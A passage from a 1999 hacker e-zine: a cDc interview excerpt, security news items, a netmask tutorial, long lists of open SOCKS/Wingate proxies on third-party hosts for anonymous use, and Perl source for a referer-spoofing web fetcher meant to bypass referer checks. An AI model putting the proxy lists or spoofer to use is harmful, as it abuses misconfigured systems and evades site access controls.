      Tweety Fish answers: Near the end of the cold war, Obscure Images was 
      captured by a splinter faction of the KGB, and forced to write polemics, 
      in verse, in a futile attempt to turn the people of the former Soviet 
      Union back on the true path to communism. He's back 
      now, and doing fine, except for that twitch. 

      Effugas asks: What tools, in your minds, would you consider the most           
      useful but least acknowledged tool in your security analysis collection?           
      When backed into a corner, unsure how to whip something into shape, what           
      obscure and strange network(or even non-network!) utility popped into           
      mind and either performed some amazing function you couldn't imagine           
      coding yourself or gave you the necessary cluephone ringing (via source           
      code peek) to pull it off yourself? 
      
      cDc answers:

      DilDog answers: lsof. Use it. 
      
      Anonymous Coward asks: My question is simple: 
      When will you start to do productive things ? 
      Ok, here is some context for the question. I know about BO2K ; and saw           
      miscellaneous software at cDc site. 
      But on the other hand, the cDc has existed much longer than Linux itself, 
        
      the FreeBSD team, NetBSD, and for probably as long as the FSF 
      itself. One one hand you have a wealth of software (for instance 
      here or here), on the other hand, after 15 years, you have a 
      handful of cracking tools, one Windows administration package, an 
      unorganized set of information, and stickers + temporary tatoos for 
      sale. In particular, it is a total mystery why since all that time, you haven't 
      done one of the following: 

           Review, summarize existing security systems, document and implement                     
           a robust security model. Unix model is total crap ; even Multics 
           (design: 1963) was better (Multics achieved B2 security rating). 
                    
           Audit publically a freely available Unix (today done by OpenBSD                     
           instead). Write automatic assembly code analyzer to search for bugs                     
           (or at least for C). Commercial tools exist by now, and last time I                     
           tried to see if a free one existed, all I could found on cDc site 
                    
           was a "Tao of Windows Buffer Overflow" (a re-hash of techniques                     
           found for instance in Morris' Internet Worm in 1988. See Spafford's                     
           excellent report, and the Worm's FAQ). Lent a bunch of your                     
           machines, to hold contests such as "the best security model for                     
           Linux/BSD, running almost all possible services/servers, CGI, ...". 

      In this context, when will you stop selling temporary tatoos, and start           
      real programming (other than BO2K)? 

      cDc answers:

      Obscure Images answers: While cDc does some programming, this is not the           
      sole focus of our efforts. To compare us to the other groups you mention           
      you have to realize that we have different goals, as well as methods. We           
      don't feel obligated to do anything for anyone. Our work is directed by           
      our desires and our goals, not the desires of the community. Everything 
      we  do is productive in our eyes. We like to think that we've done 
      work every bit as important as any of the above groups. It's all a 
      matter of perspective. We have no problem with the people who have 
      given their time and energy to these other projects, but we are not 
      like them. We do things when we want to, in the way that we want 
      to. -- Reid Fleming answers:  Temporary tattoos are a CRITICAL 
      ELEMENT of our security strategy. To suggest otherwise is sheer 
      lunacy. -- G. Ratte' answers: Wow. I don't know  when I'm going to 
      be productive. Mom wants grandkids, too. Why should we  do those 
      things? Maybe we will, maybe we won't. Why don't you? We do other         
      things. As far as "lend a bunch of your machines to hold contests..."           
      that's funny, what bunch of machines? None of us are wealthy. You looked          
      at our site and blew it off as a "handful of cracking tools & an          
      unorganized bunch of information." That's the first electronic magazine           
      ever, starting in 1984. It was a big deal to me when I was fourteen and           
      bored in a small town, and I was doing something new and exciting and           
      fun. I don't necessarily want to satisfy your weird little computer           
      fetishes. I've got a dog and a cat and a screwy relationship and my           
      picture in SPIN and no job and I'm busy. 
      Too busy for you. 

      To quote from cDc #300: 

           THE POINT by Bryan O'Sullivan 

      you could spend an hour counting the petals in a flower it might take you    
      a year to count the veins in each petal if you spent ten lifetimes, 
      maybe you could count its cells 

      but you'd have completely missed the point you fuckhead
      
      -- Nighstalker answers: And this comes back to my first answer. cDc is 
      NOT ABOUT PROGRAMMING! 

      Programming and computers are only a means to an end. -- Tequila Willy           
      answers:

      Dear Anonymous Coward,

      Your question seems very serious and as such seems to be counter           
      productive. The Cult of the Dead Cow exemplifies the very attitude that           
      ought to be cultivated considering the absurd nature of existence. Take a 
      moment to contemplate your death and your own concerns about what counts 
      as productive behavior may shift. You may think to yourself, "I am merely 
      a mortal who will die, but I must live responsibility for the sake of 
      those who will survive me." But of course your friends and family will die 
      and there will come a time when no one alive will even have a memory of 
      your existence. And if that weren't enough, at some point our own Sun will 
      supernova, and when this occurs, human life on earth will be destroyed. 

          At that point, human beings will not even exist to contemplate the 
      fates of those like yourself who died long ago. From this perspective, all 
      human actions seem to take on an equal importance: our concerns are          
      absurd! To live freely and responsibility, a mature human being must          
      realize this point. Having fun, living and loving well, being playful           
      (and hence flexible in your living): these actions take on much greater           
      importance than behaving in a serious (and hence rigid) manner. Your           
      question is foolish because it is not asked with a foolish spirit. 
      -- Tweety Fish answers: Read our files. Read our press releases. It's 
       all about  style, jackass. Incidentally, the first of your suggestions
      is a primary goal of the OpenBSD project, like you said. The second 
      suggestion is a fine idea, why don't you do it? (re: spafford's paper
      and the internet worm, the internet worm didn't run on win32, now, did
      it?). As for the  third suggestion, gee, that's a great idea. Why don't
      we kick down a  couple hundred thousand for a semi-trailer we can turn 
      into the cDc hackmobile, and load it up with all these high-end systems
      we have sitting around, and hire somebody to drive it around the country
      so people can mess with it for free! 
      
      We do what we're interested in, what's fun, and what's within our 
      resources, plain and simple. And we try to keep it funny. 

      Descriptions of who these people are are at 
      http://www.cultdeadcow.com/members/. 
      
      @HWA
      
48.0  Buffer Overflow in Communicator May Allow Code to Run           
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
          Another buffer overflow in the Windows 
      version of
           Netscape Communicator has been discovered. This one
           
      deals with incorrect bounds-checking in dynamic font
           support. 
      Example exploit code is available and confirms
           the overflow on NT 
      4.0 using Netscape 4.61 and 4.7. It
           should be possible use this 
      exploit to execute arbitrary
           code. 

      White Hats       
          
      http://www.whitehats.com/browsers/maxvisioncrash47/index.html
      
      @HWA
      
49.0  Listserver hacked
      ~~~~~~~~~~~~~~~~~
      
      From http://www.403-security.org/
      
      http://www.it.fairfax.com.au/breaking/19991021/A1636-1999Oct21.html
      
      
      Update: Evidence points to listserver hack 14:59 Thursday 21 October 1999 
    
           By NATHAN COCHRANE A PRESS release announcement e-mail listserver 
      attached to the Federal Department of Communications, IT and the 
      Arts appears to have been hacked.

      Several e-mails purporting to be from the department have arrived in           
      reporters' mail boxes this afternoon, almost perfect duplicates of           
      announcements sent earlier in the day about a postal code of practice.           
      However, the sending address was from an anonymous remailer, Replay.com,           
      based in the Netherlands and the e-mails did not contain a subject line. 
      Subtle changes were made to the apparently hacked e-mails, including a           
      pointer to a nonexistent Web page on the DCITA official site and a notice    
           asking those seeking to remove themselves from the mailing list to 
      send a message to a provokative, non-existent address. 

      A spokesman for the Minister, Senator Alston, was unavailable for comment. 

      Roddy Strachan, a Melbourne expert in Linux majordomo list group systems,     
      said it appeared the server had been incorrectly configured, allowing a 
      hacker in through an insecure default setting. 
      
      "Well, the way I have set up our mailing list program, is that people who     
           aren't subscribed can't post to the list," Strachan said. "And the 
      admin has to approve all posts before it goes out to the 
      receipients. This stops the hassle of bouncing mailers, etc. 

      "Looking at the message  it should say majordomo@blah and using           
      Replay.com is very suss. Even the URL, the 'path=1234', just looks like a     
           made-up piece of nonsense." Replay.com specialises in providing 
      anonymous remailing services, cryptographic products including Pretty Good
      Privacy,  books on cracking security systems like DES, and secure Linux 
      distributions. 
      
      @HWA
      
50.0 Skewl: "How a Netmask Works" By Steven Lee        
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       
                              How a netmask works.
                                        
       _________________________________________________________________
                                        
     Preface
     
     I've been using the internet for several years now. when I set up my
         
     first slip connection, I waded through mountains of cryptic
         
     information that I barely understood. One of the pieces of information
         
     that I really didn't understand at all was how a netmask worked. I
         
     just took it on fath that it made sense and used whatever numbers
         
     someone gave me. I finally found a reference that (almost) described
         
     how a netmask works. Armed with a near description, I sat down with a
         
     scientific calculator (I can't convert decimal to binary and back in
         
     my head) and figured out what the description meant. Since this has
         
     been a hole in my knowlege, and all the references I have seen don't
         
     spell it out, I decided to see if I can explain it and add to the pool
         
     of knowlege so you won't have to go through my process to discover
         
     this.
     
       _________________________________________________________________
                                        
     There are three pieces of information that interact with each other to
         
     resolve IP addressing. They are the netmask, the IP address, and the
         
     network address. As you may already know, when an IP packet is sent to
         
     a foreign address (off of this local network) the network address is
         
     all that is used for routing purposes until the packet reaches the
         
     target network. At this point the whole IP address is used to
         
     determine the specific machine on this network to send the packet to
         
     based on local routing tables or dynamic ARP (address resolution
         
     protocol, which we will not cover here). In order for a router to know
         
     the network address, it uses the IP address and the netmask.
     
     Here's the relationship:
     
     Your network address is your IP address masked (bitwise AND) with your
         
     netmask. This may mean nothing to you without the following
         
     clarification. Lets use an example.
     
     If your netmask is: 255.255.255.0
         and your IP address is: 
     198.139.158.3
     
       _________________________________________________________________
                                        
     your Network address is: 198.139.158.0
     
     If you were in a subnetted environment you might have:
     
     If your netmask is: 255.255.255.224
         and your IP address is: 
     198.139.158.55
     
       _________________________________________________________________
                                        
     your Network address is: 198.139.158.32
     
     This still only alludes to the "secret" of the netmask. To shed light
         
     on the second example lets take a look at the meaning of the netmask.
         
     We are going to convert the decimal notation (4 octets), to binary
         
     notation. The 1's in the netmask will imply the value "true", while
         
     the 0's will imply the value "false". The true values will be allowed
         
     to pass throught the netmask and the false values will not. The
         
     netmask acts as a filter.
     
     
     
                                    Decimal
                                        
                                     Binary
                                        
     The IP address: 198.139.158.55
         11000110 10001011 10011110 00110111
         
     The netmask: 255.255.255.224
         11111111 11111111 11111111 11100000
         
     The Network address would be: 198.139.158.32
         11000110 10001011 
     10011110 00100000
     
     In the above chart, you can see in the binary column that whenever the
         
     netmask value is 0, the network address also has a value of 0.
         
     Whenever the netmask has a value of 1, the corresponding network
         
     address takes its value from the IP address. Try looking down from the
         
     IP address, to the netmask, then to the network address, digit by
         
     digit.
     
     I hope this clarifies it for you.
     
     Produced by:
     
     Steven Lee, steven@main.nc.us
     
     @HWA
     
51.0  More proxies supplied by IRC 4 ALL          
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced by sAs- (sas2@usa.net) 
      
      A lot of these servers work and are fresh, I've used them successfully
      on IRC I won't mention which servers you can use that don't require 
      IDENT or check for OPEN PROXIES but they are out there!, suggestion:
      do a /links and go thru the list until you find a server that will
      let you on. - Ed
      
      http://www.lightspeed.de/irc4all/index.htm
      
      
      Port       Wingate service
      ~~~~       ~~~~~~~~~~~~~~~~~~~~~~
      
       21        FTP Proxy Server
       23        Telnet Proxy Server
       53        DNS Proxy Server
       80        WWW Proxy Server
       110       POP3 Proxy Server
       808       Remote Control Service
       1080      SOCKS Proxy Server
       1090      Real Audio Proxy Server
       7000      VDOlive Proxy Server
       8000      XDMA Proxy Server
       8010      Log Service
       
     Telnet/SOCKS (wingate etc) Proxies;
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

     
     LOC  URL                                         Port  Type      Socks 4 / 5
     ~~~  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ~~~~  ~~~~~~~~  ~~~~~~~~~~~
      AR  host010226.ciudad.com.ar                    1080  SOCKS           4 
      AU  pen22755-1.gw.connect.com.au                1080  WINGATE         5
      AU  frontier.netline.net.au                     1080  SOCKS           4
      AU  leading.ozemail.com.au                      1080  SOCKS           5
      AU  mail.coolmore.com.au                        1080  WINGATE         5
      AU  ntclib.ntc.qld.edu.au                       1080  SOCKS           5
      BR  ns.uss.br                                   1080  SOCKS           5
      BR  eta.riosoft.softex.br                       1080  SOCKS           4
      CA  165-246.tr.cgocable.ca                      1080  WINGATE         5
     COM  adsl-98.cais.com                            1080  RIDEWAY         4
     COM  server.goway.com                            1080  SOCKS           4
     COM  dciserver.twfrierson.com                    1080  SOCKS           4
     COM  wdpcdc.wdpc.com                             1080  WINGATE         4
     COM  www.hotelescarrousel.com                    1080  SOCKS           4
     COM  tconl9016.tconl.com                         1080  WINGATE         5
     COM  ci30211-b.sptnbrg1.sc.home.com              1080  SOCKS           4
     COM  MF2-1-036.mgfairfax.rr.com                  1080  NETPROXY        4
     COM  proxy.mppw.com                              1080  SOCKS           4 
      CZ  ns.elaso.cz                                 1080  SOCKS           4
      CZ  dialog.vol.cz                               1080  GATE            5
      CZ  nb8.czcom.cz                                1080  SOCKS           5
      IP  194.186.180.100                             1080  GATE            5
      IP 195.133.120.5                                1080  SOCKS           4
      IP 200.241.64.130                               1080  SOCKS           5
      IP 195.14.148.98                                1080  SOCKS           4
      IP 194.226.165.234                              1080  WINGATE         4
      JP wingate.shokoren.or.jp                       1080  WINGATE         4
      JP svr1.macrovision.co.jp                       1080  SOCKS           4
      JP mail.gincorp.co.jp                           1080  WINGATE         4
      JP ishibashi.ishibashi.tennouji.osaka.jp        1080  WINGATE         5
      JP tateyama.tokyo.main.co.jp                    1080  SOCKS           4
      JP ns0-gw.nsjnet.co.jp                          1080  SOCKS           4
      JP dns1.toei-bm.co.jp                           1080  SOCKS           5
      JP note.ark.ne.jp                               1080  SOCKS           4
      JP dns.yoshinomasa.co.jp                        1080  WINGATE         5
      JP www.onlyoneht.co.jp                          1080  WINGATE         5
      JP ns.holonic.co.jp                             1080  SOCKS           4
      MX www.columbus.com.mx                          1080  SOCKS           4
      MX www.internext.com.mx                         1080  SOCKS           4
      MX www.coroplast.com.mx                         1080  SOCKS           4
      MX www.baa.com.mx                               1080  SOCKS           4
      MX www.skydive.com.mx                           1080  SOCKS           4
      MX www.victor.com.mx                            1080  SOCKS           4
      MX www.elgigante.com.mx                         1080  SOCKS           4
      MX skydive.com.mx                               1080  SOCKS           4
      MX www.centrovirtual.com.mx                     1080  SOCKS           4
      MX www.swgari.com.mx                            1080  SOCKS           4
      MX www.parbo.com.mx                             1080  SOCKS           4
      MX www.simatex.com.mx                           1080  SOCKS           4
      MX madero2.interxcable.net.mx                   1080  SOCKS           4
      MX www.interxcable.net.mx                       1080  SOCKS           4
      MX www.leben.com.mx                             1080  SOCKS           4    
      MX www.mactam.com.mx                            1080  SOCKS           4 
      MX www.magicosur.com.mx                         1080  SOCKS           4 
      MX www.toro.com.mx                              1080  SOCKS           4 
      MX www.vivo.com.mx                              1080  SOCKS           4  
      MX www.somisa.com.mx                            1080  SOCKS           4 
      MX www.directodefabrica.com.mx                  1080  SOCKS           4
      MX madero1.interxcable.net.mx                   1080  SOCKS           4
     NET gbell.ne.mediaone.net                        1080  SOCKS           4
     NET modemcable244.0-200-24.hull.mc.videotron.net 1080  WINGATE         4
     NET centervill.ne.mediaone.net                   1080  SOCKS           5
     NET 216-224-151-137.stk.jps.net                  1080  GATE            5
     NET 216-224-142-228.stk.jps.net                  1080  RIDEWAY         4
     NET edtn003189.hs.telusplanet.net                1080  STARTECH        4
     NET edtn003331.hs.telusplanet.net                1080  WINGATE         4 
     NET saward.lnk.telstra.net                       1080  WINGATE         5 
     NET remoha.lnk.telstra.net                       1080  WINGATE         5
      NZ jonghyun.static.star.net.nz                  1080  GATE            5
      PE interate.com.pe                              1080  SOCKS           4
      RU promix.hospital168.nsc.ru                    1080  SOCKS           5
      RU ns.molot.ru                                  1080  SOCKS           4
      UA stella.interlink.net.ua                      1080  SOCKS           4
      US carver.ocs.k12.al.us                         1080  SOCKS           5
      US wforest.ocs.k12.al.us                        1080  SOCKS           5
      US south.ocs.k12.al.us                          1080  SOCKS           5  
      UY web.urudata.com.uy                           1080  SOCKS           4
      UY 122-94.w3.com.uy                             1080  SOCKS           4
      
      (C) Paradox
      paradox@cyberjunkie.com
      
      Check the pages for more proxies/updates...
      http://www.lightspeed.de/irc4all/index.htm
      
      
      
      Other proxies;
      ~~~~~~~~~~~~~
      
      Sourced by sAs-
      From http://proxys4all.cgi.net/public.html

      Magus Net Anonymous Proxy [.com - USA] www.magusnet.com 
      The Magus Net proxy is a great free public proxy server based in Arizona,
      USA. It can be quiet busy and can be slow or down some times. They provide
      free HTTP, FTP, WAIS and GOPHER proxy service and also offer a pay service
      for SSL & SSH. and now have added a demo for SSL. 
   
      The Magus Net delgate proxy can be used in your browser setting or manually
      in the url window. It also allows chaining before and after their proxy:
   
      Example HTTP:
      http://magusnet.com:8084/-_-http://www.destination.domain
      Example FTP:
      http://magusnet.com:8084/-_-ftp://ftp.destination.domain
   
      - Currently active ports: 3128,8081,8082,8083,9000,10080
      3128 - Local - Access by Account Holders Only
      8081 - Local - Public Access
      8082 - Chained thru Ringer DeleGate Proxy in Japan
      8083 - Chained thru NRL Onion Router in US - Operated by US.Navy
      8084 - WAS chained thru Lucent Personal WWW Assistant in US 
             LPWA has gone pay-only(proxymate.com). 
             Port closed July 14, 1999
             See http://www.lpwa.com for details.
      9000 - Local - Encrypts with SSL between your browser and this Proxy
      10080 - Local - Public Access
   
      Magus Net proxy hosts can also be reached as:
   
      magusnet.gilbert.az.us
      
      Junkbuster Proxy Services [.com -USA] www.junkbuster.com 
      The Internet Junkbuster Proxy blocks unwanted banner ads and protects
      your privacy from cookies and other threats. It's free and runs under
      Windows 95/98/NT and a variety of UNIX-like systems. It works with
      almost any browser. Installation typically takes minutes. 

      JunkBuster Proxys: 
      ~~~~~~~~~~~~~~~~~~

      yoho.uwaterloo.ca:8000
      kleinbonum.ethz.ch:8000
      xar.ethz.ch:8000
      alpha.fact.rhein-ruhr.de:8000
      fax-bior.sozwi.uni-kl.de:8000
      junkbuster.rz.uni-karlsruhe.de:8000
      maccaroni.unix-ag.uni-kl.de:8000
      maccaroni.unix-ag.uni-kl.de:8001
      maccaroni.unix-ag.uni-kl.de:8002
      maccaroni.unix-ag.uni-kl.de:8003
      mail.sozwi.uni-kl.de:8000
      proxy.rhein-ruhr.de:8000
      rena.zfn.uni-bremen.de:3128
      www-cache.unix-ag.uni-kl.de:8000
      www-cache.unix-ag.uni-kl.de:8001
      www-cache.unix-ag.uni-kl.de:8002
      www-cache.unix-ag.uni-kl.de:8003
      ad-proxy.eclipse.net:8000
      olympus.eclipse.net:8000
      very.elastic.org:8000
      
      Web-based CGI proxies;
      ~~~~~~~~~~~~~~~~~~~~~~
      
      http://proxys4all.cgi.net/web-based.html
      
      Telnet/SOCKS proxies;
      ~~~~~~~~~~~~~~~~~~~~~
      
      193.13.151.71                                   wingates all port 23
      195.226.224.136
      195.226.228.53                                  I keep hoping to have more for you all                                  
      195.226.228.80                                  but as fast as I can get them they tend to die.
      195.226.241.194
      195.246.23.33                                   Best bet is always to scan your own.
      200.231.130.210
      202.208.218.5                                   These have not all been tested yet.
      203.116.31.153
      206.58.25.46
      206.74.68.76
      207.15.167.177
      207.216.188.21
      207.44.26.82
      208.222.9.10
      209.160.126.201
      209.20.27.130
      210.161.237.19
      210.162.200.83
      210.163.83.178
      212.30.75.8
      216.77.244.92
      24.3.105.29
      24.3.11.131
      24.3.131.46
      24.3.82.41
      24.48.44.57
      24.64.132.67.on.wave.home.com
      24.93.112.238
      24.93.158.201
      24.93.158.57
      55-050.hy.cgocable.ca
      adsl-151-198-16-75.bellatlantic.net
      adsl-206-170-148-119.dsl.pacbell.net
      adsl-216-100-248-127.dsl.pacbell.net
      adsl-216-100-248-86.dsl.pacbell.net
      adsl-77-244-92.mia.bellsouth.net
      adsl1-110.mts.net
      adsl1-186.mts.net
      as1-8.qualitynet.net
      as1-8.qualitynet.net
      as3-53.qualitynet.net
      as4-78.qualitynet.net
      as5-19.qualitynet.net
      as8-157.qualitynet.net
      as8-194.qualitynet.net
      cc42238-a.avnl1.nj.home.com
      cc495632-a.srst1.fl.home.com
      cc762726-a.wlgrv1.pa.home.com
      cdr8-53.accesscable.net
      cowsys03.cowansystems.com
      cs9360-254.austin.rr.com
      cue.dk
      d185d183a.rochester.rr.com
      d185d1ef9.rochester.rr.com
      dns.fatwa.gov.kw
      dns.meridien.com.kw
      dt095n09.maine.rr.com
      dt095nc9.maine.rr.com
      dxt.ozemail.com.au
      dynamic57.pit.adelphia.net
      ewwmail.ozemail.com.au
      gdsl173.sttl.uswest.net
      gen2-114ip6.cadvision.com
      gen2-87ip27.cadvision.com
      host-209-214-34-114.mco.bellsouth.net
      hse-tor-ppp21220.sympatico.ca
      hssktn1-82.sk.sympatico.ca
      i-tec.co.jp
      interlog.interlog.fr
      ip2-196.highend.com
      ishibashi.ishibashi.tennouji.osaka.jp
      lan-duclos4-15.cancom.net
      m44155.direcpc.net
      mail.sjn.nl
      mdrass.moc.kw
      mp-217-242-207.daxnet.no
      nat198.85.mpoweredpc.net
      nbtel3-78.nbtel.net
      nbtel6-93.nbtel.net
      ppdual.augen.med.uni-giessen.de
      ppp-16-41.cyberia.net.lb
      ppp-16-80.cyberia.net.lb
      pppa4-resalegreenbay1-5r1066.saturn.bbn.com
      pppa40-resalegreenbay1-5r1066.saturn.bbn.com
      pppa5-resalelansing1-4r1106.saturn.bbn.com
      ppplink-dial55.idepot.net
      proxy-laregione.ibbs.net
      sacnl.globalpc.net
      siia.uan.mx
      sim-home-5-14.urbanet.ch
      stn194.hiq-ca.com
      studios.alger.it
      studios.alger.it
      we-24-130-42-117.we.mediaone.net
      wingate.rosdev.ca
      wlc35.cablelan.net


      AU - AUSTRALIA 
      
      URL / IP                                PORT     CONNECTION    COMMENTS 
      leading1.ozemail.com.au                 1080     WINGATE       
      
      
      COM - COMMERCIAL 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      www.exponential.com                     1080     SOCKS 
      www.aquatechpools.com                   1080     SOCKS
      cx107569-b.fed1.sdca.home.com           1080     WINGATE
      revere-nt.reverecontrol.com             1080     SOCKS
      cramer.qni.com                          1080     WINGATE
      mail.arielmutualfund.com                1080     WINGATE       No Socks
      

      EE - ESTONIA / IP                       PORT     CONNECTION    COMMENTS 
      
      ttp.park.tartu.ee                       1080     WINGATE
      
      
      GR- GREECE 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      pacman-cafe0.tri.forthnet.gr            1080     WINGATE
      
      
      IP 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      194.186.208.54                          1080     SOCKS
      194.149.136.55                          1080     SOCKS 
      194.149.136.3                           1080     SOCKS
      194.149.136.42                          1080     SOCKS 
      24.230.31.236                           1080     WINGATE
      195.61.198.1                            1080     WINGATE
      209.178.61.117                          1080     WINGATE
      
      IT - ITALY 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      194.185.198.28                          1080     SOCKS
      www.aere.it                             1080     SOCKS
      
      JP - JAPAN 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      ark.ark.ne.jp                           1080     SOCKS 
      ns.tsuruga.or.jp                        1080     SOCKS
      
      MK - MACEDONIA 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      www.zic.gov.mk                          1080     SOCKS 
      
      MX - MEXICO 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      t2s20.data.net.mx                       1080     WINGATE       No Socks 

      NET - NETWORK 
      URL / IP                                PORT     CONNECTION    COMMENTS 
      
      modemcable227.152.mtimi.videotron.net     23     STARGATE 
      col-000-6.iquest.net                    1080     SOCKS 
      softengtech-i.iquest.net                1080     SOCKS
      holmes.intellex.net                     1080     SOCKS
      CBL-pssandhu1.hs.earthlink.net          1080     WINGATE
      poste253.autray.net                     1080     WINGATE
      monelco.wincom.net                      1080     WINGATE      Only Telnet



      SK - SLOVAK REPUBLIC 
      URL / IP                                PORT    CONNECTION    COMMENTS 
      
      gw-2.tatrahome.sk                       1080    SOCKS
      
      Copyright 1998-99 Proxys 4 All 



    
      @HWA
      
52.0  Perl source for a webspoofing HTTP grabber
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced by sAs- 
      
      From http://proxys4all.cgi.net/files/webspf.pl
      
      #!/usr/bin/perl
      #
      # Web Spoof      
      # Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]      
      #      
      # Summary:       
      # Works as a normal command line web retrieval script,      
      # except will spoof the referer. This can be left to the script to do,      
      # or specified in the command line. This will bypass any kind of reference      
      # checking, in most cases. Will also screw up the REMOTE_HOST variable which      
      # some cgi scripts use, but the correct IP will of course be sent. Default      
      # broswer is Netscape 4.5 under Win95. This can be changed in the script.      
      #      
      # Usage:  - default output is standard out, to save to a file      
      #           you will need to redirect it, especially for        
      #           binary/image files -      
      #      
      #  ./webspf.pl [file] <referer>      
      #      
      # Examples:      
      #      
      #  ./webspf.pl language.perl.com/info/software.html > software.html      
      #      - referer would be language.perl.com/info/index.html -      
      #      
      #  ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif      
      #      - referer would be www.linux.org/images/logo/index.html -      
      #      
      #  ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html      
      #      - referer would be www.freebsd.org/whatever.html -      
      #      
      #      
      # 
      
      use IO::Socket;      
      
      
      $loc = $ARGV[0];                             # www.a.com/test.html      
      $temp = reverse($loc);                       # lmth.tset/moc.a.www      
      $host = substr($temp,rindex($temp,"\/")+1);  # moc.a.www      
      $host = reverse($host);                      # www.a.com      
      $dir = substr($loc,index($loc,"\/"));        # /test.html      
            
      $referer = $ARGV[1];                         # <blank>      
      if($referer eq "") {                         # true      
       $temp = substr($temp,index($temp,"\/")+1);  # /moc.a.www      
       $temp = reverse($temp);                     # www.a.com/      
       $referer = $temp . "index\.html";           # www.a.com/index.html      
       }                                           # spoofed referer!     
      
      
      print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";      
      print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n"    
      
      
      $res = 0;      
      $handle = IO::Socket::INET->new(Proto => "tcp",      
         PeerAddr => $host,      
         PeerPort => 80) or $res = 1;      
      if($res eq 0) {      
       $handle->autoflush(1);      
       print STDERR "\[Connected to $host\]\n";      
       print $handle "GET $dir HTTP/1.0\n";      
       print $handle "Referer: $referer\n";      
       print $handle "Connection: Close\n";      
       print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n";      
       print $handle "Host: $host\n";        
       print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";      
       print $handle "Accept-Encoding: gzip\n";      
       print $handle "Accept-Language: en\n";      
       print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";      
       while($temp ne "") { # read some headers      
        $temp = <$handle>;      
        chop($temp);chop($temp);      
        @sort = split(/:/,$temp);      
        if(@sort[0] =~ /server/i)  { print STDERR " \[$temp\]\n"; }      
        if(@sort[0] =~ /date/i)    { print STDERR " \[$temp\]\n"; }      
        if(@sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; }      
        }      
        
       print STDERR "\[Recieving data\]\n";       
       binmode(STDOUT);
      
       while(<$handle>) {      
        print "$_";      
        }
      
       close($handle);      
       print STDERR "\[Connection Closed\]\n";      
       } else { print STDERR "\[Could not connect to $host\]\n"; }
       
       @HWA
       
53.0  MACMILLAN USA MOVES TO SECURE LINUX
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNS http://www.net-security.org/
      
      
      by Thejian, Saturday 23rd October 1999 on 1:25 pm CET
      MacMillan Publishing USA has entered into a strategic alliance with
      SecurityPortal.com to bring online security technologies to users of the Linux
      operating system (OS). The new product, Maximum Security Linux, will be
      jointly-released to provide administrators who run Linux with security-related
      capabilities such as intrusion detection, system auditing and monitoring along with
      virus protection. The package suite will bundle a wide range of security software made
      available through the GNU General Public License (GPL), and will provide access to
      "best practices" FAQs, policy guides and various security tips. 
      
      http://www.ecommercetimes.com/news/articles/991022-7.shtml
      
      MacMillan USA Moves To Secure Linux 
      By Matthew W. Beale 
      E-Commerce Times
      October 22, 1999 
     
                      MacMillan Publishing USA has entered into a strategic 
                      alliance with SecurityPortal.com to bring online security 
                      technologies to users of the Linux operating system (OS). 

                      The new product, Maximum Security Linux, will be 
                      jointly-released to provide administrators who run Linux 
                      with security-related capabilities                       
                      such as intrusion detection, system auditing and 
                      monitoring along with virus protection. 

      The package suite will bundle a wide range of security software made 
      available through the GNU General Public License (GPL), and will provide 
      access to "best       practices" FAQs, policy guides and various security 
      tips. 

      "MacMillan's retail distribution and SecurityPortal's security knowledge 
      makes for a great partnership," commented Steve Schafer, Sr., title 
      manager for       Macmillan's Linux software. "Getting this knowledge and 
      these tools into the hands of the Linux user is essential to help ensure 
      the security of the many personal and corporate Linux systems being 
      installed every day." 

      Rising Security Threats 

      Jim Reavis, SecurityPortal.com Webmaster, designed the product in response 
      to "the ever increasing size and complexity of networked software, 
      combined       with the sophistication of today's hackers." He added that 
      Internet professionals need to more seriously consider securing their 
      operations, pointing out that "we are more exposed to security threats 
      than at any other time." 

      There are some 12 million Linux users worldwide, according to 
      International Data Corp. (IDC). Those numbers alone, say industry 
      analysts, should serve as       incentive for companies to move into the 
      relatively quiet Linux security solutions market. 

      Maximum Secure Linux works with systems running the Linux kernel version 
      2.2.5 or higher. Internet security information provider SecurityPortal.com 
      also       offers "technotes" and opinion pieces from IT security experts, 
      security-related news and links to security alerts, tools and other 
      resources. 

      The third largest operating system provider after Microsoft and Apple, 
      MacMillan offers The Complete Linux OS, a Linux distribution by 
      MandrakeSoft that is       based on Red Hat. Establishing an early 
      strategic relationship with Red Hat, Inc., MacMillan has been involved 
      with the Linux community for almost four years.

      E-Commerce Security 

      Linux is increasingly being deployed by e-commerce operations, and IDC 
      numbers show that the open-source environment captured more than 17 
      percent of       all server shipments last year. Security concerns among 
      e-commerce professionals, including those working with Linux-based 
      systems, are sometimes justified. 

      A study conducted by Information Security Magazine earlier this year 
      indicated that e-commerce operations are 57 percent more likely to 
      experience a       security breach than other online sites. Additionally, 
      e-commerce sites are 24 percent more likely to be the target of a 
      hacker/cracker attack.  
      
      @HWA
      
54.0 ANONYMOUS REMAILERS
     ~~~~~~~~~~~~~~~~~~~
     
     From HNS http://www.net-security.org/
     
     by BHZ, Saturday 23rd October 1999 on 2:56 am CET
     "A remailer is computer service that privatizes your e-mail. This is in sharp contrast to
